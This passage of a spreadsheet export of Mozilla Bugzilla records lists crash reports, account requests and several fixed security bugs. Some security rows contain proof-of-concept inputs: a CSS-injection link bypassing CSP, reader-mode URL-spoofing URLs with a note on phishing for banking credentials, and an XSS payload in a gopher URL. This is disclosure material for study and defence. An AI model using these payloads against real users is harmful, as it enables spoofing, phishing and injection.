      <c r="I1323" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1323" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1323" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1323" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1323" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main101+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q1323" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1323" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1323" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T1323" t="n">
        <v>1</v>
      </c>
      <c r="U1323" t="n">
        <v>0</v>
      </c>
      <c r="V1323" t="n">
        <v>33</v>
      </c>
      <c r="W1323" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1460538 +++
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180503143129
Steps to reproduce:
By using the reflected URL in some special resource URIs it is possible to inject CSS and bypass CSP: http://demo.vwzq.net/php/ff_chrome.php
Stylesheet injection is not XSS, but still harmful.
Content:
&lt;link rel="stylesheet" href="chrome://browser/content/places/?'*{}*{color:red}"&gt;
Actual results:
The reflected stylesheet is interpreted bypassing the strict CSP policy.
Expected results:
I guess the mitigation here should be to avoid reflecting any user content, or at least avoid loading directories.
---
This appears to still be broken.</t>
        </is>
      </c>
      <c r="X1323" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" t="n">
        <v>627781</v>
      </c>
      <c r="B1324" t="inlineStr">
        <is>
          <t>2011-01-21 10:12:32 -0800</t>
        </is>
      </c>
      <c r="C1324" t="inlineStr">
        <is>
          <t>Notifications: Move object_id back into Watch</t>
        </is>
      </c>
      <c r="D1324" t="inlineStr">
        <is>
          <t>2011-02-01 13:18:46 -0800</t>
        </is>
      </c>
      <c r="E1324" t="n">
        <v>1</v>
      </c>
      <c r="F1324" t="n">
        <v>1</v>
      </c>
      <c r="G1324" t="n">
        <v>5</v>
      </c>
      <c r="H1324" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1324" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1324" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1324" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1324" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1324" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1324" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1324" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q1324" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1324" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1324" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T1324" t="n">
        <v>1</v>
      </c>
      <c r="U1324" t="n">
        <v>0</v>
      </c>
      <c r="V1324" t="n">
        <v>5</v>
      </c>
      <c r="W1324" t="inlineStr">
        <is>
          <t>If we put it with content_type, we can use a GenericForeignKey, which *should* (test this) delete a Watch when the object it's watching gets deleted. We may have to subclass GenericForeignKey if it doesn't tolerate a NULL object_id.</t>
        </is>
      </c>
      <c r="X1324" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" t="n">
        <v>1195976</v>
      </c>
      <c r="B1325" t="inlineStr">
        <is>
          <t>2015-08-18 12:31:34 -0700</t>
        </is>
      </c>
      <c r="C1325" t="inlineStr">
        <is>
          <t>URL spoofing in reader mode</t>
        </is>
      </c>
      <c r="D1325" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:28 -0700</t>
        </is>
      </c>
      <c r="E1325" t="n">
        <v>1</v>
      </c>
      <c r="F1325" t="n">
        <v>1</v>
      </c>
      <c r="G1325" t="n">
        <v>3</v>
      </c>
      <c r="H1325" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1325" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1325" t="inlineStr">
        <is>
          <t>Reader Mode</t>
        </is>
      </c>
      <c r="K1325" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L1325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1325" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1325" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q1325" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1325" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1325" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1325" t="n">
        <v>1</v>
      </c>
      <c r="U1325" t="n">
        <v>0</v>
      </c>
      <c r="V1325" t="n">
        <v>30</v>
      </c>
      <c r="W1325" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
Steps to reproduce:
Open reader mode by navigating to one of the following URLs:
about:reader?url=http://igi.tl%23@mozilla.org
about:reader?url=http://igi.tl?@mozilla.org
about:reader?url=http://igi.tl%23.mozilla.org
about:reader?url=http://igi.tl?.mozilla.org
about:reader?url=http://lab.igi.tl/redirect-to-mozilla-org.php
Actual results:
For the first four URLs, reader mode displays content from igi.tl, but highlights the URL in the URL bar as if the content was being served from mozilla.org. For the fifth URL, reader mode displays content from blog.mozilla.org as a result of an HTTP 302 redirection, but retains the original igi.tl URL in the URL bar.
Expected results:
When following redirections (assuming it's necessary in the first place), reader mode should update the displayed URL to match the one the content is actually being loaded from. When displaying the URL, highlighting should be done in a way matching the parsing that's done for the actual fetching of data. That is, when "http://igi.tl%23@mozilla.org" is parsed as "http://igi.tl/#@mozilla.org", the URL should be displayed so that "igi.tl" is highlighted with a darker font instead of "mozilla.org".
Now, as for exploiting the issue... The first four URLs listed above demonstrate a partial URL spoof, in that the real domain will always be visible, but with the wrong part of the URL highlighted. The fifth is a more "full" URL spoof, but it requires that the victim site contains an open redirection. Those are fairly common in the wild, though.
There are a couple of things that limit the impact here, quite considerably even. First off, reader mode strips all dynamic content off the page, so you can't run scripts on the spoofed page. I don't know how secure the sandboxing is, or if it's even intended to be secure, and I didn't spend a great deal of time on investigating that. Without JavaScript you can still inject text, images, and links, which are plenty to trick an unsuspecting user into handing over their online banking credentials.
Secondly, Firefox doesn't allow linking to the reader mode URL directly. You can have links pointing to it, but clicking on them doesn't do anything. There's a way around this though, if you can trick the user to bookmark the link. Dragging the link to the bookmarks toolbar or right-clicking it and selecting "Bookmark This Link" both work. When the bookmark has been created, clicking it will take you to the spoofed page just as you'd expect. This is related to bug 1185918. I'm also guessing that it would be possible to link to the page from an external application, like email client.
I've tested this on Firefox for Android 40.0 and Iceweasel 38.1.0 on Debian and Iceweasel 38.2.0 on Kali. Worth noting is that this works just as well on both mobile and desktop.</t>
        </is>
      </c>
      <c r="X1325" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" t="n">
        <v>1204580</v>
      </c>
      <c r="B1326" t="inlineStr">
        <is>
          <t>2015-09-14 10:21:44 -0700</t>
        </is>
      </c>
      <c r="C1326" t="inlineStr">
        <is>
          <t>Stagefright: crash [@stagefright::SampleTable::setCompositionTimeToSampleParams]</t>
        </is>
      </c>
      <c r="D1326" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:38 -0700</t>
        </is>
      </c>
      <c r="E1326" t="n">
        <v>1</v>
      </c>
      <c r="F1326" t="n">
        <v>1</v>
      </c>
      <c r="G1326" t="n">
        <v>3</v>
      </c>
      <c r="H1326" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1326" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1326" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1326" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1326" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1326" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1326" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1326" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q1326" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1326" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1326" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T1326" t="n">
        <v>1</v>
      </c>
      <c r="U1326" t="n">
        <v>0</v>
      </c>
      <c r="V1326" t="n">
        <v>20</v>
      </c>
      <c r="W1326" t="inlineStr">
        <is>
          <t>Created attachment 8660824
call_stack.txt
Since I can not consistently reproduce this issue I am going to assume there is a race component and that this may not always be a null crash. Feel free to open it up if this is not the case.</t>
        </is>
      </c>
      <c r="X1326" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" t="n">
        <v>476603</v>
      </c>
      <c r="B1327" t="inlineStr">
        <is>
          <t>2009-02-02 23:10:36 -0800</t>
        </is>
      </c>
      <c r="C1327" t="inlineStr">
        <is>
          <t>[SECURITY] Editing attachments doesn't have any CSRF protection</t>
        </is>
      </c>
      <c r="D1327" t="inlineStr">
        <is>
          <t>2013-09-08 09:19:38 -0700</t>
        </is>
      </c>
      <c r="E1327" t="n">
        <v>1</v>
      </c>
      <c r="F1327" t="n">
        <v>1</v>
      </c>
      <c r="G1327" t="n">
        <v>4</v>
      </c>
      <c r="H1327" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1327" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1327" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K1327" t="inlineStr">
        <is>
          <t>3.2.1</t>
        </is>
      </c>
      <c r="L1327" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1327" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1327" t="inlineStr">
        <is>
          <t>[sg:want][wanted-bmo]security</t>
        </is>
      </c>
      <c r="Q1327" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1327" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1327" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1327" t="n">
        <v>1</v>
      </c>
      <c r="U1327" t="n">
        <v>0</v>
      </c>
      <c r="V1327" t="n">
        <v>32</v>
      </c>
      <c r="W1327" t="inlineStr">
        <is>
          <t>I loaded an attachment.cgi action=view page while logged in with my justdave@mozilla.com account.  I then logged out and back in with my justdave@bugzilla.org account, then submitted my changes on the form without reloading it, and it let me.  The CSRF check should have failed on that because I was using a different User ID.
LpSolit says that's the only form left that wasn't done yet, and he didn't have a bug on file for it, so here's the bug.</t>
        </is>
      </c>
      <c r="X1327" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" t="n">
        <v>705591</v>
      </c>
      <c r="B1328" t="inlineStr">
        <is>
          <t>2011-11-27 20:02:33 -0800</t>
        </is>
      </c>
      <c r="C1328" t="inlineStr">
        <is>
          <t>Profile Reviews are missing---GONE!!!!</t>
        </is>
      </c>
      <c r="D1328" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E1328" t="n">
        <v>1</v>
      </c>
      <c r="F1328" t="n">
        <v>1</v>
      </c>
      <c r="G1328" t="n">
        <v>6</v>
      </c>
      <c r="H1328" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1328" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1328" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K1328" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1328" t="inlineStr"/>
      <c r="Q1328" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1328" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1328" t="inlineStr">
        <is>
          <t>6.3.6</t>
        </is>
      </c>
      <c r="T1328" t="n">
        <v>1</v>
      </c>
      <c r="U1328" t="n">
        <v>0</v>
      </c>
      <c r="V1328" t="n">
        <v>20</v>
      </c>
      <c r="W1328" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24
Build ID: 20111103063747
Steps to reproduce:
Viewed my profile reviews. 
Checked some of add-ons I reviewed.
Actual results:
Most of the dozens and dozens and dozens of reviews I have written are missing!!!!! Only 6 remain.
Did not find reviews under my profile or under some of the add-ons.
Expected results:
Should have seen list of dozens and dozens and dozens of my reviews. 
Should have found my reviews under the add-ons.</t>
        </is>
      </c>
      <c r="X1328" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" t="n">
        <v>772282</v>
      </c>
      <c r="B1329" t="inlineStr">
        <is>
          <t>2012-07-09 16:37:19 -0700</t>
        </is>
      </c>
      <c r="C1329" t="inlineStr">
        <is>
          <t>InsertElementTxn crash</t>
        </is>
      </c>
      <c r="D1329" t="inlineStr">
        <is>
          <t>2022-03-06 06:11:53 -0800</t>
        </is>
      </c>
      <c r="E1329" t="n">
        <v>1</v>
      </c>
      <c r="F1329" t="n">
        <v>1</v>
      </c>
      <c r="G1329" t="n">
        <v>3</v>
      </c>
      <c r="H1329" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1329" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1329" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1329" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1329" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1329" t="inlineStr"/>
      <c r="Q1329" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1329" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1329" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T1329" t="n">
        <v>1</v>
      </c>
      <c r="U1329" t="n">
        <v>0</v>
      </c>
      <c r="V1329" t="n">
        <v>45</v>
      </c>
      <c r="W1329" t="inlineStr">
        <is>
          <t>Created attachment 640419
testcase (crashes Firefox when loaded)</t>
        </is>
      </c>
      <c r="X1329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" t="n">
        <v>1267507</v>
      </c>
      <c r="B1330" t="inlineStr">
        <is>
          <t>2016-04-25 18:35:20 -0700</t>
        </is>
      </c>
      <c r="C1330" t="inlineStr">
        <is>
          <t>crash in cubeb_resampler_speex::cubeb_resampler_speex</t>
        </is>
      </c>
      <c r="D1330" t="inlineStr">
        <is>
          <t>2017-04-11 05:49:12 -0700</t>
        </is>
      </c>
      <c r="E1330" t="n">
        <v>1</v>
      </c>
      <c r="F1330" t="n">
        <v>1</v>
      </c>
      <c r="G1330" t="n">
        <v>3</v>
      </c>
      <c r="H1330" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1330" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1330" t="inlineStr">
        <is>
          <t>Audio/Video: cubeb</t>
        </is>
      </c>
      <c r="K1330" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1330" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1330" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1330" t="inlineStr"/>
      <c r="Q1330" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1330" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1330" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1330" t="n">
        <v>1</v>
      </c>
      <c r="U1330" t="n">
        <v>0</v>
      </c>
      <c r="V1330" t="n">
        <v>3</v>
      </c>
      <c r="W1330" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-a8e223bd-7f2f-4159-aee8-5c6582160425.
=============================================================
There's a small number of crashes creating a resampler in the WASAPI backend.  The cause isn't obvious from the crash stacks.
Similar crash with a truncated (probably corrupt) stack: https://crash-stats.mozilla.com/report/index/f1a06780-7795-4b85-b457-d3a6e2160425</t>
        </is>
      </c>
      <c r="X1330" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" t="n">
        <v>826392</v>
      </c>
      <c r="B1331" t="inlineStr">
        <is>
          <t>2013-01-03 11:34:35 -0800</t>
        </is>
      </c>
      <c r="C1331" t="inlineStr">
        <is>
          <t>compartment checker fail in mozilla::plugins::parent::_evaluate</t>
        </is>
      </c>
      <c r="D1331" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1331" t="n">
        <v>1</v>
      </c>
      <c r="F1331" t="n">
        <v>1</v>
      </c>
      <c r="G1331" t="n">
        <v>6</v>
      </c>
      <c r="H1331" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1331" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1331" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1331" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1331" t="inlineStr">
        <is>
          <t>INVALID</t>
        </is>
      </c>
      <c r="P1331" t="inlineStr">
        <is>
          <t>[adv-main21-][fixed in 21 by 824864][probably bogus assertion]</t>
        </is>
      </c>
      <c r="Q1331" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1331" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1331" t="n">
        <v>1</v>
      </c>
      <c r="U1331" t="n">
        <v>0</v>
      </c>
      <c r="V1331" t="n">
        <v>22</v>
      </c>
      <c r="W1331" t="inlineStr">
        <is>
          <t>I found 3 crashes like this when searching through some crash stacks for the cross-compartment pointer checker.
0 js::CompartmentChecker::fail 	js/src/jscntxtinlines.h:205
1 JS_GetStringCharsZAndLength 	js/src/jsapi.cpp:6055
2 JSValToNPVariant 	dom/plugins/base/nsJSNPRuntime.cpp:435
3 mozilla::plugins::parent::_evaluate 	dom/plugins/base/nsNPAPIPlugin.cpp:1599
4 mozilla::plugins::PluginScriptableObjectParent::AnswerNPN_Evaluate 	dom/plugins/ipc/PluginScriptableObjectParent.cpp:1197
5 mozilla::plugins::PPluginScriptableObjectParent::OnCallReceived 	obj-firefox/ipc/ipdl/PPluginScriptableObjectParent.cpp:776
6 mozilla::plugins::PPluginModuleParent::OnCallReceived 	obj-firefox/ipc/ipdl/PPluginModuleParent.cpp:1288
I'm not sure exactly what is going wrong, because the string comes from |scx-&gt;EvaluateStringWithValue|, where |scx| is the |GetScriptContextFromJSContext| of the context we're calling JS_GetStringCharsZAndLength on.
https://crash-stats.mozilla.com/report/index/b5621c05-db57-412e-bdb1-b475c2130101
https://crash-stats.mozilla.com/report/index/f97d5d0f-f881-4f45-b755-efad72121229
https://crash-stats.mozilla.com/report/index/995820a8-b2b8-40c5-b050-785ab2130101</t>
        </is>
      </c>
      <c r="X1331" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" t="n">
        <v>330505</v>
      </c>
      <c r="B1332" t="inlineStr">
        <is>
          <t>2006-03-14 13:59:56 -0800</t>
        </is>
      </c>
      <c r="C1332" t="inlineStr">
        <is>
          <t>please merge cbiesinger@gmail.com with cbiesinger@gmx.at</t>
        </is>
      </c>
      <c r="D1332" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E1332" t="n">
        <v>1</v>
      </c>
      <c r="F1332" t="n">
        <v>1</v>
      </c>
      <c r="G1332" t="n">
        <v>7</v>
      </c>
      <c r="H1332" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1332" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1332" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1332" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1332" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1332" t="inlineStr"/>
      <c r="Q1332" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1332" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1332" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1332" t="n">
        <v>1</v>
      </c>
      <c r="U1332" t="n">
        <v>0</v>
      </c>
      <c r="V1332" t="n">
        <v>3</v>
      </c>
      <c r="W1332" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202 Epiphany/1.6.5
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202 Epiphany/1.6.5
cbiesinger@gmail.com (this account) is not really used, it would be great if it could be merged with cbiesinger@gmx.at.
Please do not overwrite any bugzilla settings for the gmx.at account :-)
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" t="n">
        <v>556734</v>
      </c>
      <c r="B1333" t="inlineStr">
        <is>
          <t>2010-04-02 04:31:19 -0700</t>
        </is>
      </c>
      <c r="C1333" t="inlineStr">
        <is>
          <t>XSS in gopher parser when parsing hrefs</t>
        </is>
      </c>
      <c r="D1333" t="inlineStr">
        <is>
          <t>2010-11-11 14:08:04 -0800</t>
        </is>
      </c>
      <c r="E1333" t="n">
        <v>1</v>
      </c>
      <c r="F1333" t="n">
        <v>1</v>
      </c>
      <c r="G1333" t="n">
        <v>3</v>
      </c>
      <c r="H1333" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1333" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1333" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1333" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1333" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1333" t="inlineStr">
        <is>
          <t>[sg:high][critsmash-high:investigate]</t>
        </is>
      </c>
      <c r="Q1333" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1333" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1333" t="n">
        <v>1</v>
      </c>
      <c r="U1333" t="n">
        <v>0</v>
      </c>
      <c r="V1333" t="n">
        <v>31</v>
      </c>
      <c r="W1333" t="inlineStr">
        <is>
          <t>Robert Święcki of Google Switzerland GmbH reported an XSS in the gopher parser via security@.
He also states "not sure what's the FF same origin policy and whether it's possible to steal cookies or perform XMLHttpRequest(), but it's probably worth fixing".
gopher://glog.fosconetwork.org/0/billets/rejet-hadopi-09-04-2009.?&amp;a=http://www.google.com%27%3CZZ%22%3E%3C/a%3E%3Cscript%3Ealert%283%29%3C/script%3E</t>
        </is>
      </c>
      <c r="X1333" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" t="n">
        <v>680880</v>
      </c>
      <c r="B1334" t="inlineStr">
        <is>
          <t>2011-08-22 06:19:19 -0700</t>
        </is>
      </c>
      <c r="C1334" t="inlineStr">
        <is>
          <t>Security problem with loadSubScript on 1.9.2 branch</t>
        </is>
      </c>
      <c r="D1334" t="inlineStr">
        <is>
          <t>2012-01-19 10:28:48 -0800</t>
        </is>
      </c>
      <c r="E1334" t="n">
        <v>1</v>
      </c>
      <c r="F1334" t="n">
        <v>1</v>
      </c>
      <c r="G1334" t="n">
        <v>3</v>
      </c>
      <c r="H1334" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1334" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1334" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1334" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1334" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1334" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1334" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1334" t="inlineStr">
        <is>
          <t>[sg:critical][qa!] patch in bug 653926</t>
        </is>
      </c>
      <c r="Q1334" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1334" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1334" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1334" t="n">
        <v>1</v>
      </c>
      <c r="U1334" t="n">
        <v>0</v>
      </c>
      <c r="V1334" t="n">
        <v>14</v>
      </c>
      <c r="W1334" t="inlineStr">
        <is>
          <t>On 1.9.2, using loadSubScript with a content object as the scope object is
potentially unsafe.
On 1.9.2, the parent chain of XPCNativeWrapper/SJOW reaches to a content
window, thus the subscript can directly access content objects.
For example:
* An object created in the subscript is not a SJOW.
* When the scope object is an XPCNativeWrapper, "document" is not an XPCNativeWrapper.
  in subscript:
  window.toString() -&gt; [object XPCNativeWrapper [object Window]]
  window.document.toString() -&gt; [object XPCNativeWrapper [object HTMLDocument]]
  document.toString() -&gt; [object HTMLDocument]</t>
        </is>
      </c>
      <c r="X1334" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" t="n">
        <v>1816287</v>
